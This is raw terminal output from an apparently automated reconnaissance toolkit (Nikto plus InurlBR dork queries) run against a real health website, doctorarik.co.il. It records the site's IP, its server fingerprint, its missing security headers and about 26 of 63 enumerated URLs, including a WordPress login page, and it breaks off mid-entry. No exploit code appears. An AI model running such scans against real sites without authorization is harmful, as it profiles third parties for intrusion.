- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/sitemap.xml">here</a></body>
- [94m+ -- --=[Checking cookie attributes on doctorarik.co.il...[0m [93m
- [94m+ -- --=[Checking for ASP.NET Detailed Errors on doctorarik.co.il...[0m [93m
- [0m
- [92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 62.219.91.10
- + Target Hostname: doctorarik.co.il
- + Target Port: 80
- + Start Time: 2017-12-30 23:23:35 (GMT-5)
- ---------------------------------------------------------------------------
- + Server: Microsoft-IIS/7.5
- + Retrieved x-powered-by header: ASP.NET
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'x-powered-by-plesk' found, with contents: PleskWin
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Root page / redirects to: http://www.doctorarik.co.il/
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + Scan terminated: 20 error(s) and 5 item(s) reported on remote host
- + End Time: 2017-12-30 23:31:03 (GMT-5) (448 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- [92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
- [91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/doctorarik.co.il-port80.jpg
- [92m + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +[0m
- [92m + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +[0m
- [1;37m _____ [1;37m .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. [0;31m.1BR'''Yp, .8BR'''Cq.
- [1;37m (_____)[1;37m 01 01N. C 01 C 01 .01. 01 [1;31m 01 Yb 01 .01.
- [1;37m (() ())[1;37m 01 C YCb C 01 C 01 ,C9 01 [0;31m 01 dP 01 ,C9
- [1;37m \ / [1;37m 01 C .CN. C 01 C 0101dC9 01 [1;31m 01'''bg. 0101dC9
- [1;37m \ / [1;37m 01 C .01.C 01 C 01 YC. 01 , [0;31m 01 .Y 01 YC.
- [1;37m /=\ [1;37m 01 C Y01 YC. ,C 01 .Cb. 01 ,C [1;31m 01 ,9 01 .Cb.
- [1;37m [___] [1;37m .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C [0;31m.J0101Cd9 .J01L. .J01./ [1;37m2.1
- [1;37m__[ ! ] Neither war between hackers, nor peace for the system.
- [1;37m__[ ! ] [02;31mhttp://blog.inurl.com.br
- [1;37m__[ ! ] [02;31mhttp://fb.com/InurlBrasil
- [1;37m__[ ! ] [02;31mhttp://twitter.com/@googleinurl[0m
- [1;37m__[ ! ] [02;31mhttp://github.com/googleinurl[0m
- [1;37m__[ ! ] [02;31mCurrent PHP version::[ [1;37m7.0.26-1 [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent script owner::[ [1;37mroot [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent uname::[ [1;37mLinux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent pwd::[ [1;37m/usr/share/sniper [02;31m][0m
- [1;37m__[ ! ] [1;33mHelp: php inurlbr.php --help[0m
- [1;37m------------------------------------------------------------------------------------------------------------------------[0m
- [1;37m[ ! ] Starting SCANNER INURLBR 2.1 at [30-12-2017 23:32:33][0;37m
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program[0m
- [1;37m[ INFO ][02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-doctorarik.co.il.txt ][0m
- [1;37m[ INFO ][0m[02;31m[ DORK ]::[1;37m[ site:doctorarik.co.il ]
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [1;37m{[0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE - www.google.ee ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE API ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE_GENERIC_RANDOM - www.google.im ID: 012347377894689429761:wgkj5jn9ee4 ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0;31m[ TOTAL FOUND VALUES ]::[1;37m [ 63 ][0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 0 / 63 [1;37m][0;37m-[23:32:57][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 0 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 1 / 63 [1;37m][0;37m-[23:33:02][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/20170629102001-ooy-425.html[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 2 / 63 [1;37m][0;37m-[23:33:07][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 3 / 63 [1;37m][0;37m-[23:33:12][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 4 / 63 [1;37m][0;37m-[23:33:22][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/thetencommandments/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 0 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 5 / 63 [1;37m][0;37m-[23:33:30][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/business/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 0 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 6 / 63 [1;37m][0;37m-[23:33:38][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/contact/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 7773 out of 16348 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 7 / 63 [1;37m][0;37m-[23:33:43][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/checkyourself/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 8 / 63 [1;37m][0;37m-[23:33:50][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/about/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 9 / 63 [1;37m][0;37m-[23:33:57][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/movie/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 9121 out of 15003 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 10 / 63 [1;37m][0;37m-[23:34:03][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/keepslimming/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 18557 out of 23967 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 11 / 63 [1;37m][0;37m-[23:34:12][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/parentstips/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13165 out of 19394 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 12 / 63 [1;37m][0;37m-[23:34:20][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/childfaq/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10469 out of 24867 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 13 / 63 [1;37m][0;37m-[23:34:30][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adultcustomers/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10469 out of 21199 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 14 / 63 [1;37m][0;37m-[23:34:40][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adultfaq/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 18557 out of 47581 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 15 / 63 [1;37m][0;37m-[23:34:45][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/recipes/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 2381 out of 21166 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 16 / 63 [1;37m][0;37m-[23:34:52][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/myprogram/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 17 / 63 [1;37m][0;37m-[23:34:57][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/wp-login.php[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 18 / 63 [1;37m][0;37m-[23:35:00][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/myths/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 19 / 63 [1;37m][0;37m-[23:35:06][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/business/businesstips/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 20 / 63 [1;37m][0;37m-[23:35:12][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/business/businessmyway/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13229 out of 15092 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 21 / 63 [1;37m][0;37m-[23:35:19][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/business/businessnutrition/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13229 out of 16283 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 22 / 63 [1;37m][0;37m-[23:35:22][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/stepbystep/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 23 / 63 [1;37m][0;37m-[23:35:28][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/about/drarik/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13229 out of 14705 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 24 / 63 [1;37m][0;37m-[23:35:34][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/stabbing/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 6489 out of 16732 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 25 / 63 [1;37m][0;37m-[23:35:41][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/technologylinks/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 22665 out of 53619 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 26 / 63 [1;37m][0;37m-[23:35:48][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/bmichild/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
